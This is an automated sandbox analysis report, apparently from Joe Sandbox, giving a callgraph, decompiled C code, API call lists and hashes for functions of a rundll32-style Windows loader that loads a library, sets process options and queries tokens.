LocalAlloc 1338->1341 1343 763722 1338->1343 1339->1335 1340 76368d LocalFree 1339->1340 1340->1335 1342 763718 1341->1342 1341->1343 1342->1339 1348 76374a 1343->1348 1353 7627df 1343->1353 1344 763816 1369 763168 1344->1369 1347 76382d 1347->1332 1348->1339 1348->1344 1349 763765 1349->1339 1356 762e8f 1349->1356 1351 763761 1351->1339 1351->1348 1351->1349 1360 7630e5 1351->1360 1354 7627f5 iswalpha 1353->1354 1355 7627f1 1353->1355 1354->1355 1355->1351 1357 762e9b 1356->1357 1359 762ec8 1357->1359 1383 762a67 1357->1383 1359->1348 1361 7630f3 1360->1361 1363 763133 1360->1363 1361->1363 1397 762fd3 1361->1397 1363->1349 1365 763137 1368 762fb6 2 API calls 1365->1368 1366 76312e 1404 762fb6 1366->1404 1368->1363 1370 76318a 1369->1370 1371 76320e 1370->1371 1372 7631de 1370->1372 1381 76319d 1370->1381 1374 763253 iswalpha 1371->1374 1375 763229 iswalpha 1371->1375 1373 762a67 2 API calls 1372->1373 1382 7631ff 1373->1382 1376 76323d 1374->1376 1375->1376 1378 762a67 2 API calls 1376->1378 1376->1382 1377 7632f5 wcschr 1377->1382 1378->1382 1380 762da5 iswalpha iswalpha 1380->1382 1381->1347 1382->1377 1382->1380 1382->1381 1417 762b88 1382->1417 1384 762a83 1383->1384 1385 762b2f 1384->1385 1386 762ab8 1384->1386 1388 762b15 1384->1388 1385->1359 1386->1385 1393 762748 1386->1393 1388->1385 1390 76271a 1388->1390 1391 762724 memset 1390->1391 1392 76273d 1390->1392 1391->1392 1392->1385 1394 762756 1393->1394 1395 762799 1394->1395 1396 76277b memset 1394->1396 1395->1385 1396->1395 1398 762fe5 1397->1398 1403 763032 1397->1403 1399 76300b wcschr 1398->1399 1401 763075 1398->1401 1398->1403 1400 763022 wcschr 1399->1400 1399->1403 1400->1403 1402 7630ac iswalpha 1401->1402 1401->1403 1402->1403 1403->1363 1403->1365 1403->1366 1407 762f29 1404->1407 1408 762f35 1407->1408 1408->1408 1410 762f64 1408->1410 1411 762da5 1408->1411 1410->1363 1412 762db8 1411->1412 1415 762de7 1411->1415 1413 762dc4 iswalpha 1412->1413 1412->1415 1414 762dd7 1413->1414 1414->1415 1416 762e41 iswalpha 1414->1416 1415->1410 1416->1415 1421 762ba7 1417->1421 1418 762c99 1418->1382 1419 762be0 1419->1418 1420 762748 memset 1419->1420 1420->1418 1421->1418 1421->1419 1422 76271a memset 1421->1422 1422->1419 1424 762cdd 1423->1424 1425 762cee _vsnwprintf 1424->1425 1426 762d0f 1424->1426 1425->1426 1426->1243 1426->1249 1463 761c9c 1465 761cae 1463->1465 1467 762521 1465->1467 1473 761d5e GetModuleHandleA 1465->1473 1466 761cf0 __set_app_type __p__fmode __p__commode 1468 761d28 1466->1468 1470 76252e __setusermatherr 1467->1470 1469 761d35 1468->1469 1468->1470 1475 761d46 _controlfp 1469->1475 1472 761d3a 1474 761d6f 1473->1474 1474->1466 1475->1472 1479 763f7b 1480 763f82 1479->1480 1481 763b77 8 API calls 1480->1481 1481->1480 1482 76119b 1483 7611cd 1482->1483 1484 7621f8 GetWindowLongW 1482->1484 1486 7611d7 DefWindowProcW 1483->1486 1488 7622f4 1483->1488 1484->1483 1485 76220c GetWindow 1484->1485 1485->1483 1487 762222 memset GetClassNameW 1485->1487 1489 7611ef 1486->1489 1490 762254 CompareStringW 1487->1490 1491 76227a GetWindow 1487->1491 1492 762305 SetWindowLongW 1488->1492 1493 7622fb SetClassLongW 1488->1493 1494 761189 4 API calls 1489->1494 1490->1491 1495 762273 GetWindow 1490->1495 1491->1483 1496 762287 GetWindowLongW 1491->1496 1492->1489 1493->1492 1497 7611fa 1494->1497 1495->1491 1496->1483 1498 762296 GetClassLongW 1496->1498 1498->1483 1499 7622a5 GetClassLongW SetWindowLongW SetClassLongW 1498->1499 1499->1483 1500 761979 1501 761995 1500->1501 1502 76198e _exit 1500->1502 1503 76199d _cexit 1501->1503 1504 7619a3 1501->1504 1502->1501 1503->1504

                                              Callgraph

                                              • Executed
                                              • Not Executed
                                              • Opacity -> Relevance
                                              • Disassembly available
                                              callgraph 0 Function_00762077 1 Function_00763B77 2 Function_007635FF 12 Function_007630E5 2->12 17 Function_00761AE1 2->17 20 Function_00763168 2->20 28 Function_007627DF 2->28 76 Function_00762E8F 2->76 84 Function_00761189 2->84 3 Function_00763D7C 4 Function_00763F7B 4->1 5 Function_00761578 6 Function_00761979 39 Function_007619CA 6->39 7 Function_00762A67 10 Function_007626E4 7->10 40 Function_00762748 7->40 67 Function_00761B1D 7->67 68 Function_0076271A 7->68 8 Function_00761467 9 Function_00763E64 30 Function_007626C6 10->30 11 Function_007639E5 36 Function_0076384E 11->36 46 Function_007629B3 11->46 11->84 12->17 24 Function_00762FD3 12->24 42 Function_00762FB6 12->42 13 Function_007619E3 43 Function_007620B4 13->43 45 Function_00761A33 13->45 14 Function_00761763 15 Function_00762963 41 Function_007628C9 15->41 60 Function_00762815 15->60 16 Function_00761460 17->67 18 Function_0076286E 19 Function_00763CEF 20->7 20->17 20->18 52 Function_00762DA5 20->52 56 Function_00762D2E 20->56 20->60 83 Function_00762B88 20->83 21 Function_00763F68 22 Function_00761E56 22->17 75 Function_00762001 22->75 22->84 23 Function_00763955 23->84 24->15 24->56 24->60 25 Function_007639D0 25->36 25->46 25->84 26 Function_00761D5E 59 Function_00761D96 26->59 27 Function_0076155F 29 Function_00761D46 31 Function_00761444 32 Function_00763DC5 32->3 34 Function_00763D42 32->34 32->39 79 Function_00761E0C 32->79 33 Function_00762042 33->0 35 Function_00762543 35->39 36->2 36->56 36->60 37 Function_00762CCF 38 Function_00763E4C 63 Function_00762890 41->63 58 Function_00762F29 42->58 44 Function_007619B5 44->39 77 Function_00761A8C 45->77 46->84 47 Function_00761733 48 Function_007619B1 49 Function_0076253F 50 Function_007614BD 50->11 64 Function_0076389E 50->64 50->84 51 Function_007613B9 52->15 52->56 52->60 53 Function_00761622 53->47 57 Function_00763FAD 53->57 54 Function_00762F20 55 Function_00763FA1 55->1 56->15 56->60 58->52 59->39 59->79 61 Function_00761593 62 Function_00763F93 62->1 64->37 64->84 65 Function_00763E1F 65->39 66 Function_00761C9C 66->26 66->29 81 Function_0076158B 66->81 69 Function_00763F9A 69->1 70 Function_0076119B 70->84 71 Function_00761B87 71->50 71->64 73 Function_00761C02 71->73 72 Function_00762E84 74 Function_00761203 74->8 74->13 74->17 74->22 74->23 74->31 74->51 74->53 74->64 74->71 82 Function_0076138B 74->82 75->33 75->67 76->7 78 Function_0076178C 78->14 78->32 78->39 78->61 78->74 78->79 80 Function_00763E0B 83->10 83->40 83->67 83->68 85 Function_00762689 83->85

                                              Executed Functions

                                              Function 00761203 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 125memorystringnativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              C-Code - Quality: 94%
                                              			E00761203(char _a4, WCHAR* _a12, intOrPtr _a16) {
				int _v8;
				int _v12;
				char _v16;
				void* _v20;
				void _v24;
				signed int _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				void* _t46;
				void* _t51;
				intOrPtr _t64;
				void* _t65;
				void* _t69;
				void* _t72;
				void* _t73;
				struct HWND__* _t77;

				_t71 = 1;
				__imp__HeapSetInformation(0, 1, 0, 0);
				_v24 = 1;
				NtSetInformationProcess(0xffffffff, 0x22,  &_v24, 4); // executed
				_t76 = lstrlenW(_a12) + 1;
				 *0x76504c = _a4;
				_t46 = LocalAlloc(0x40, lstrlenW(_a12) + 1 + _t76);
				_v20 = _t46;
				if(_t46 == 0) {
					L13:
					ExitProcess(0);
				}
				if(E00761AE1(_t46, _t76, _a12) >= 0 && E00761622(_t76, _v20,  &_v28,  &_a4,  &_v32,  &_a12) != 0) {
					_t81 = _v28 & 1;
					if((_v28 & 1) != 0) {
						E00763955(_a4, _a12);
					} else {
						SetErrorMode(0x8001); // executed
						_v16 = 0;
						_t64 = E00761E56(_t72, _a4,  &_v16, 1); // executed
						_v40 = _t64;
						_t65 = E007619E3(_t72, _t81, _t64); // executed
						_t82 = _t65;
						if(_t65 == 0) {
							_t51 = E0076389E(_t73,  *0x76504c, 0x403, _a4, L"requestedRunLevel");
						} else {
							_v12 = 0;
							_v8 = 0;
							_t69 = E00761B87(_t73, _t82,  *0x76504c, _a4, _v32, _a12,  &_v8,  &_v36,  &_v12); // executed
							_t71 = _v12;
							if(_t69 != 0) {
								if(_t71 != 0) {
									_a12 = _t71;
								}
								E00761467(_t72, _v8);
								_t77 = E007613B9( *0x76504c, L"RunDLL");
								E00761444(_v36, _t77,  *0x76504c, _a12, _a16);
								if(_t77 != 0) {
									DestroyWindow(_t77);
								}
								FreeLibrary(_v8);
							}
							_t51 = LocalFree(_t71);
						}
						E0076138B(_t51, _v40, _v16);
					}
				}
				LocalFree(_v20);
				goto L13;
			}




















                                              0x00761214
                                              0x00761217
                                              0x00761227
                                              0x0076122a
                                              0x0076123e
                                              0x0076123f
                                              0x0076124a
                                              0x00761250
                                              0x00761255
                                              0x00761355
                                              0x00761356
                                              0x00761356
                                              0x00761267
                                              0x0076128d
                                              0x00761290
                                              0x007624d8
                                              0x00761296
                                              0x0076129b
                                              0x007612a9
                                              0x007612ac
                                              0x007612b2
                                              0x007612b5
                                              0x007612ba
                                              0x007612bc
                                              0x007624c8
                                              0x007612c2
                                              0x007612d1
                                              0x007612d7
                                              0x007612e3
                                              0x007612e8
                                              0x007612ed
                                              0x007612f1
                                              0x007621db
                                              0x007621db
                                              0x007612fa
                                              0x00761312
                                              0x00761321
                                              0x00761328
                                              0x0076132b
                                              0x0076132b
                                              0x00761334
                                              0x00761334
                                              0x0076133b
                                              0x0076133b
                                              0x00761347
                                              0x00761347
                                              0x00761290
                                              0x0076134f
                                              0x00000000

                                              APIs
                                              • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,00765068,00000001,00000000), ref: 00761217
                                              • NtSetInformationProcess.NTDLL ref: 0076122A
                                              • lstrlenW.KERNEL32(?), ref: 00761233
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0076124A
                                              • SetErrorMode.KERNELBASE(00008001,?,?,?,?,?,00000000,00000001,?), ref: 0076129B
                                                • Part of subcall function 00761E56: GetFileAttributesW.KERNELBASE(?,00000000,00000001,00000001), ref: 00761E7F
                                                • Part of subcall function 00761E56: lstrlenW.KERNEL32(?), ref: 00761ECA
                                                • Part of subcall function 00761E56: GetFileAttributesW.KERNELBASE(?,?,00000104,.manifest), ref: 00761EF5
                                                • Part of subcall function 00761E56: CreateActCtxW.KERNEL32(00000020), ref: 00761F31
                                                • Part of subcall function 00761E56: CreateActCtxW.KERNEL32(00000020), ref: 00761F4F
                                                • Part of subcall function 00761E56: CreateActCtxW.KERNEL32(00000020), ref: 00761F69
                                                • Part of subcall function 00761E56: GetModuleHandleW.KERNEL32(00000000), ref: 00761FA3
                                                • Part of subcall function 00761E56: CreateActCtxW.KERNEL32(00000000), ref: 00761FC0
                                                • Part of subcall function 00761E56: ActivateActCtx.KERNEL32(00000000,?), ref: 00761FCD
                                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,00000000,?,?,00000001), ref: 0076133B
                                                • Part of subcall function 00761467: RtlImageNtHeader.NTDLL(?), ref: 0076147A
                                                • Part of subcall function 00761467: ImageDirectoryEntryToData.IMAGEHLP(?,00000001,0000000A,00000001,?,?,007612FF,00000001,?,?,?,00000001,?,?,00000000,?), ref: 0076149C
                                                • Part of subcall function 007613B9: LoadIconW.USER32 ref: 007613E3
                                                • Part of subcall function 007613B9: LoadCursorW.USER32 ref: 007613F2
                                                • Part of subcall function 007613B9: RegisterClassW.USER32 ref: 00761413
                                                • Part of subcall function 007613B9: CreateWindowExW.USER32 ref: 00761432
                                              • DestroyWindow.USER32 ref: 0076132B
                                              • FreeLibrary.KERNEL32(00000001,?,00000000,?,?,RunDLL,00000001,?,?,?,00000001,?,?,00000000,?,?), ref: 00761334
                                              • LocalFree.KERNEL32(?,00000000,00000001,?), ref: 0076134F
                                              • ExitProcess.KERNEL32 ref: 00761356
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: Create$FreeLocal$AttributesFileImageInformationLoadProcessWindowlstrlen$ActivateAllocClassCursorDataDestroyDirectoryEntryErrorExitHandleHeaderHeapIconLibraryModeModuleRegister
                                              • String ID: RunDLL$requestedRunLevel
                                              • API String ID: 1179100334-3494409908
                                              • Opcode ID: 07ee11f4a62d8b76216e87614070d1642ca3ff462be22a60166b284798f18aba
                                              • Instruction ID: c88bd9664e5f1ba4b21aaf27dd8f7e04664c89f8e64fc7b8dc12e84262dd9b52
                                              • Opcode Fuzzy Hash: 07ee11f4a62d8b76216e87614070d1642ca3ff462be22a60166b284798f18aba
                                              • Instruction Fuzzy Hash: E3410875900249FBCF129FA1DC4DDEE7FB9FB08340F588025FE13A1161DA798A54ABA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007614BD Relevance: 7.6, APIs: 5, Instructions: 78libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 180 7614bd-7614f5 LoadLibraryExW 181 7623fc-762409 GetLastError 180->181 182 7614fb-761504 RtlImageNtHeader 180->182 183 76243f-76244f 181->183 184 76240b-76240c call 7639e5 181->184 185 761506-76150f 182->185 186 761519 182->186 188 762454-76245c FormatMessageW 183->188 191 762411-762413 184->191 185->186 189 761511-761513 SetProcessDEPPolicy 185->189 190 76151f-76152d call 761189 186->190 188->186 192 762462-76247a call 76389e 188->192 189->186 194 762415-762417 191->194 195 76241c-76243d 191->195 192->186 194->190 195->188
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008,00000000,00000000,00000001), ref: 007614E7
                                              • RtlImageNtHeader.NTDLL(00000000), ref: 007614FC
                                              • SetProcessDEPPolicy.KERNEL32(00000003), ref: 00761513
                                              • GetLastError.KERNEL32 ref: 007623FC
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: ErrorHeaderImageLastLibraryLoadPolicyProcess
                                              • String ID:
                                              • API String ID: 1237969533-0
                                              • Opcode ID: 63efabbb05e666f301ada55a39c2804eba5857458432c83dfef62b94ebfef692
                                              • Instruction ID: b597f4b6b1ef62a2f729155ed7e4dd83f893ee2fe0e31b53a502b9ba082d95f3
                                              • Opcode Fuzzy Hash: 63efabbb05e666f301ada55a39c2804eba5857458432c83dfef62b94ebfef692
                                              • Instruction Fuzzy Hash: 6521A47164025CBFEB119B60CC8DEEA7B6CEB44344F944465FA07E3181DAB89E888B60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007619E3 Relevance: 4.5, APIs: 3, Instructions: 48nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 209 7619e3-761a00 call 761a33 212 761a27-761a2b 209->212 213 761a02-761a06 209->213 213->212 214 761a08-761a1a call 7620b4 213->214 217 761a20-761a21 214->217 218 762108-76211b NtOpenProcessToken 214->218 217->212 220 762383-762385 217->220 218->212 219 762121-762142 NtSetInformationToken NtClose 218->219 219->212 220->212
                                              C-Code - Quality: 36%
                                              			E007619E3(void* __ecx, void* __eflags, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t16;
				signed int _t21;
				void** _t22;
				void* _t28;

				_push(__ecx);
				_push(__ecx);
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t16 = E00761A33(__ecx,  &_v8); // executed
				_t28 = _t16;
				if(_t28 != 0 && _v8 == 0) {
					E007620B4(_a4,  &_v12);
					_t21 = _v12;
					if(_t21 == 0) {
						_t22 =  &_a4;
						__imp__NtOpenProcessToken(0xffffffff, 0x80, _t22);
						if(_t22 >= 0) {
							_v12 = 1;
							__imp__NtSetInformationToken(_a4, 0x18,  &_v12, 4);
							NtClose(_a4);
						}
					} else {
						if(_t21 != 1) {
							_t28 = 0;
						}
					}
				}
				return _t28;
			}









                                              0x007619e8
                                              0x007619e9
                                              0x007619ea
                                              0x007619ee
                                              0x007619f7
                                              0x007619fc
                                              0x00761a00
                                              0x00761a0f
                                              0x00761a17
                                              0x00761a1a
                                              0x00762108
                                              0x00762113
                                              0x0076211b
                                              0x0076212c
                                              0x00762133
                                              0x0076213c
                                              0x0076213c
                                              0x00761a20
                                              0x00761a21
                                              0x00762383
                                              0x00762383
                                              0x00761a21
                                              0x00761a1a
                                              0x00761a2b

                                              APIs
                                                • Part of subcall function 00761A33: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00761A4B
                                                • Part of subcall function 00761A33: NtClose.NTDLL ref: 00761A6E
                                                • Part of subcall function 007620B4: QueryActCtxW.KERNEL32(80000000,000000FF,00000000,00000005,?,0000000C,00000000), ref: 007620E4
                                              • NtOpenProcessToken.NTDLL(000000FF,00000080,00000000), ref: 00762113
                                              • NtSetInformationToken.NTDLL ref: 00762133
                                              • NtClose.NTDLL ref: 0076213C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: Token$CloseOpenProcess$InformationQuery
                                              • String ID:
                                              • API String ID: 1146784981-0
                                              • Opcode ID: b8b41b697ba9f80b6a20cd8dc0cd13e1cd6c06f3a8a2cc8e113e9a36565ff153
                                              • Instruction ID: 57405b6a82c364fa153ae5341a5f1f2d6f109626959876fa347efe85002461ed
                                              • Opcode Fuzzy Hash: b8b41b697ba9f80b6a20cd8dc0cd13e1cd6c06f3a8a2cc8e113e9a36565ff153
                                              • Instruction Fuzzy Hash: B2019E7250060CFBDB108BD4CC0DBED7AB8EB52351F988154FA02E6190DBB98B45C790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00761A8C Relevance: 3.1, APIs: 2, Instructions: 53nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 221 761a8c-761ac0 NtQueryInformationToken 222 761ad5-761ad9 221->222 223 761ac2-761ac6 221->223 224 7621e3-7621e8 223->224 225 761acc-761acf 223->225 224->222 225->222 226 762362-762378 NtQueryInformationToken 225->226 227 76237e 226->227 228 7621ed-7621f1 226->228 227->222 228->224 229 7621f3 228->229 229->222
                                              APIs
                                              • NtQueryInformationToken.NTDLL ref: 00761ABC
                                              • NtQueryInformationToken.NTDLL ref: 00762374
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: InformationQueryToken
                                              • String ID:
                                              • API String ID: 4239771691-0
                                              • Opcode ID: 4e3167e1ff924f52f2ae3604de67e87a657326a9a03735b30a871902b9c3e7e3
                                              • Instruction ID: 7e26a5f33503d8a6d6d1bcb436725f7059f0330afa67dd784242bfc273507f95
                                              • Opcode Fuzzy Hash: 4e3167e1ff924f52f2ae3604de67e87a657326a9a03735b30a871902b9c3e7e3
                                              • Instruction Fuzzy Hash: B411177290161CFBDB11CF85CC44FEAB7BCEB49760F548056FA1296151D3749A02DBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00761A33 Relevance: 3.0, APIs: 2, Instructions: 39nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 230 761a33-761a53 NtOpenProcessToken 231 761a55-761a64 call 761a8c 230->231 232 761a7f-761a84 230->232 234 761a69-761a77 NtClose 231->234 234->232 235 761a79-761a7e 234->235 235->232
                                              C-Code - Quality: 58%
                                              			E00761A33(void* __ecx, void* _a4) {
				char _v8;
				char _v12;
				void** _t9;
				void* _t13;
				void* _t20;
				char _t21;
				void* _t23;
				intOrPtr* _t24;

				_t24 = _a4;
				_t9 =  &_a4;
				_t21 = 0;
				 *_t24 = 0;
				__imp__NtOpenProcessToken(0xffffffff, 8, _t9, _t20, _t23, __ecx, __ecx);
				if(_t9 >= 0) {
					_v8 = 0;
					_t13 = E00761A8C(__ecx, _a4,  &_v8,  &_v12); // executed
					NtClose(_a4);
					if(_t13 >= 0) {
						 *_t24 = _v8;
						_t21 = 1;
					}
				}
				return _t21;
			}











                                              0x00761a3b
                                              0x00761a3f
                                              0x00761a45
                                              0x00761a49
                                              0x00761a4b
                                              0x00761a53
                                              0x00761a61
                                              0x00761a64
                                              0x00761a6e
                                              0x00761a77
                                              0x00761a7c
                                              0x00761a7e
                                              0x00761a7e
                                              0x00761a77
                                              0x00761a84

                                              APIs
                                              • NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00761A4B
                                                • Part of subcall function 00761A8C: NtQueryInformationToken.NTDLL ref: 00761ABC
                                              • NtClose.NTDLL ref: 00761A6E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: Token$CloseInformationOpenProcessQuery
                                              • String ID:
                                              • API String ID: 65470678-0
                                              • Opcode ID: 57ce463f166c8a5781ab6dc87fbd3e83d52984dbd4efaa0d6bbd9e0eed98812b
                                              • Instruction ID: 4c73ce320ad246dda22e2488d26e337015ec3ba2340836cc2e6eb1ba87e60b3d
                                              • Opcode Fuzzy Hash: 57ce463f166c8a5781ab6dc87fbd3e83d52984dbd4efaa0d6bbd9e0eed98812b
                                              • Instruction Fuzzy Hash: 02F0627A600208BBDB009F95CC48DDF7BADEB95350B148129FE52D3250D6749B409B60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00761E56 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 127stringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              C-Code - Quality: 38%
                                              			E00761E56(void* __ecx, WCHAR* _a4, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				short _v528;
				intOrPtr* _v532;
				intOrPtr _v544;
				WCHAR* _v556;
				signed int _v560;
				signed int _v564;
				WCHAR* _v568;
				struct HINSTANCE__* _v572;
				signed int _v580;
				char _v596;
				signed int _v600;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				long _t42;
				WCHAR* _t46;
				void* _t49;
				signed int _t51;
				signed int _t54;
				signed int _t56;
				signed int _t58;
				WCHAR* _t60;
				void* _t63;
				long _t65;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				WCHAR* _t77;
				void* _t78;
				long _t79;
				signed int _t80;

				_v8 =  *0x765040 ^ _t80;
				_t41 = _a8;
				_t77 = _a4;
				_t70 = 0;
				_v532 = _t41;
				 *_t41 = 0; // executed
				_t42 = GetFileAttributesW(_t77); // executed
				_t79 = 0x104;
				if(_t42 == 0xffffffff) {
					if(SearchPathW(0, _t77, 0, 0x104,  &_v528,  &_v568) != 0) {
						L2:
						_v560 = _v560 & 0x00000000;
						_t46 =  &_v528;
						_t70 = _t70 | 0xffffffff;
						_v564 = 0x20;
						_v556 = _t46;
						_t77 = lstrlenW(_t46);
						_t49 = E00762001( &_v528, _t79, L".manifest");
						_t79 = __imp__CreateActCtxW;
						if(_t49 >= 0) {
							_t65 = GetFileAttributesW( &_v528); // executed
							if(_t65 != _t70) {
								_t70 =  *_t79( &_v564);
							}
						}
						 *((short*)(_t80 + _t77 * 2 - 0x20c)) = 0;
						if(_t70 != 0xffffffff) {
							L14:
							_push(_v532);
							_push(_t70);
							goto L11;
						} else {
							_v560 = 8;
							_v544 = 0x7b;
							_t54 =  *_t79( &_v564); // executed
							_t70 = _t54;
							if(_t70 != 0xffffffff) {
								goto L14;
							}
							_v544 = 0x7c;
							_t56 =  *_t79( &_v564); // executed
							_t70 = _t56;
							if(_t70 != 0xffffffff) {
								L12:
								_t51 = _t70;
								L13:
								return E00761189(_t51, _t70, _v8 ^ _t80, _t76, _t77, _t79);
							}
							_v544 = 2;
							_t58 =  *_t79( &_v564); // executed
							_t70 = _t58;
							if(_t70 != 0xffffffff) {
								goto L14;
							}
							if(_a12 == 0) {
								goto L12;
							}
							_v600 = _v600 & 0x00000000;
							_t76 = 7;
							_t74 = _t76;
							_t78 =  &_v596;
							_t60 = memset(_t78, 0, _t74 << 2);
							_t77 = _t78 + _t74;
							_v596 = 0x88;
							_v580 = _t76;
							_v572 = GetModuleHandleW(_t60);
							_v600 = 0x20;
							_t63 =  *_t79( &_v600);
							if(_t63 == _t70) {
								goto L12;
							}
							_push(_v532);
							_push(_t63);
							L11:
							__imp__ActivateActCtx();
							goto L12;
						}
					}
					L16:
					_t51 = 0;
					goto L13;
				}
				if(E00761AE1( &_v528, 0x104, _t77) < 0) {
					goto L16;
				}
				goto L2;
			}




































                                              0x00761e68
                                              0x00761e6b
                                              0x00761e71
                                              0x00761e74
                                              0x00761e77
                                              0x00761e7d
                                              0x00761e7f
                                              0x00761e85
                                              0x00761e8d
                                              0x00762355
                                              0x00761ea9
                                              0x00761ea9
                                              0x00761eb0
                                              0x00761eb7
                                              0x00761eba
                                              0x00761ec4
                                              0x00761ed5
                                              0x00761edf
                                              0x00761ee4
                                              0x00761eec
                                              0x00761ef5
                                              0x00761efd
                                              0x00762621
                                              0x00762621
                                              0x00761efd
                                              0x00761f05
                                              0x00761f10
                                              0x007620fc
                                              0x007620fc
                                              0x00762102
                                              0x00000000
                                              0x00761f16
                                              0x00761f1d
                                              0x00761f27
                                              0x00761f31
                                              0x00761f33
                                              0x00761f38
                                              0x00000000
                                              0x00000000
                                              0x00761f45
                                              0x00761f4f
                                              0x00761f51
                                              0x00761f56
                                              0x00761fd3
                                              0x00761fd3
                                              0x00761fd5
                                              0x00761fe3
                                              0x00761fe3
                                              0x00761f5f
                                              0x00761f69
                                              0x00761f6b
                                              0x00761f70
                                              0x00000000
                                              0x00000000
                                              0x00761f7a
                                              0x00000000
                                              0x00000000
                                              0x00761f7c
                                              0x00761f85
                                              0x00761f88
                                              0x00761f8a
                                              0x00761f90
                                              0x00761f90
                                              0x00761f93
                                              0x00761f9d
                                              0x00761fa9
                                              0x00761fb6
                                              0x00761fc0
                                              0x00761fc4
                                              0x00000000
                                              0x00000000
                                              0x00761fc6
                                              0x00761fcc
                                              0x00761fcd
                                              0x00761fcd
                                              0x00000000
                                              0x00761fcd
                                              0x00761f10
                                              0x0076235b
                                              0x0076235b
                                              0x00000000
                                              0x0076235b
                                              0x00761ea3
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00000000,00000001,00000001), ref: 00761E7F
                                              • lstrlenW.KERNEL32(?), ref: 00761ECA
                                              • GetFileAttributesW.KERNELBASE(?,?,00000104,.manifest), ref: 00761EF5
                                              • CreateActCtxW.KERNEL32(00000020), ref: 00761F31
                                              • CreateActCtxW.KERNEL32(00000020), ref: 00761F4F
                                              • CreateActCtxW.KERNEL32(00000020), ref: 00761F69
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00761FA3
                                              • CreateActCtxW.KERNEL32(00000000), ref: 00761FC0
                                              • ActivateActCtx.KERNEL32(00000000,?), ref: 00761FCD
                                              • SearchPathW.KERNEL32 ref: 0076234D
                                              • CreateActCtxW.KERNEL32(00000020), ref: 0076261F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: Create$AttributesFile$ActivateHandleModulePathSearchlstrlen
                                              • String ID: $ $.manifest$P4Uu0TUu$|
